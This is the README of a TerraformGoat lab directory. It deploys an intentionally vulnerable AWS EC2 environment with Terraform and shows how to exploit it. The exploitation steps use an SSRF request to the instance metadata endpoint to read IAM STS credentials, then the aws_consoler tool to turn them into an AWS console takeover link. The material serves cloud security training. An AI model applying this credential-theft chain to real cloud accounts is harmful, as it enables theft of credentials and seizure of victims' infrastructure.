Skip to content

console_takeover

Directory actions

More options

Directory actions

More options

Latest commit

 

History

History

console_takeover

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
README.md
README.md
 
 
README_CN.md
README_CN.md
 
 
main.tf
main.tf
 
 
outputs.tf
outputs.tf
 
 
versions.tf
versions.tf
 
 

README.md

AWS Console Takeover Vulnerable Environment

English | 中文

Description

This is a scenario used to build the AWS Console Takeover vulnerability environment.

After building the environment with Terraform, The SSRF vulnerability can be used to obtain STS data on EC2 and then use the STS data to take over the AWS console.

Deployment Environment

Execute the following command in the container

cd /TerraformGoat/aws/ec2/console_takeover/

Configure AWS Access Credentials

aws configure

You can see the access key in the AWS [Console --> Security Credentials]

Deploy Vulnerable Environment

terraform init
terraform apply

When the terminal prompts Enter a value:, enter yes

After the environment is set up, You can see the access address of the scenario at Outputs, then access to the browser.

Vulnerability Utilization

On EC2 with SSRF vulnerabilities, we can use SSRF to read STS information.

Read STS information

http://169.254.169.254/latest/meta-data/iam/security-credentials/huoxian_terraform_goat_role

img

Generate AWS console access links with the aws_consoler tool

apt install python3-pip
pip install aws-consoler
aws_consoler -R us-east-1 -a {Your_AccessKeyId} -s {Your_SecretAccessKey} -t {Your_Token}

Copy the generated link into your browser and open it to take over the AWS Service Console.

img

Destroy the environment

terraform destroy